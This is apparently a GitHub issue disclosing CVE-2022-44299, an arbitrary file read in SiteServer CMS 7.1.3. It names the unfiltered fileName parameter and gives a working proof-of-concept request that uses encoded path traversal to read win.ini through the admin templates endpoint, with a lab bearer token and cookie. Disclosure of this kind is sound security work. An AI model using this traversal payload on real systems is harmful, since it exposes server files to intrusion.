Headline
CVE-2022-44299: background file reading · Issue #3491 · siteserver/cms
SiteServerCMS 7.1.3 sscms has a file read vulnerability.
Vulnerability conditions
SSCMS v7.1.3 +mysql+administrator privileges
Vulnerability details
- Code analysis found /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=
An arbitrary file read vulnerability exists in the interface
code analysis process
\SSCMS.Web\Controllers\Admin\Cms\Templates\TemplatesAssetsEditorController.Get.cs
Enter and find that the FileName parameter is controllable and there is no filtering to pass into the ReadTextAsync method
The entry method discovery is to read out the cultural content, resulting in a file read vulnerability.
Vulnerability verification
An exp packet occurs after logging in to the background to obtain administrator credentials
GET /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5CWindows%5Cwin.ini&fileType=html&siteId=1 HTTP/1.1 Host: 192.168.3.129 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.9 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MDY1NDYwLCJleHAiOjE2NjYxNTE4NjAsImlhdCI6MTY2NjA2NTQ2MH0.C_5BVy0Tlv-s9n8Nq2zgummkzvn50prSoOefuRVhBR8 Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I Referer: http://192.168.3.129/ss-admin/cms/templatesAssetsEditor/?siteId=1&directoryPath=&fileName=&fileType=html&tabName=dd25719b-c34e-40df-883f-6a991a23d826 Accept-Encoding: gzip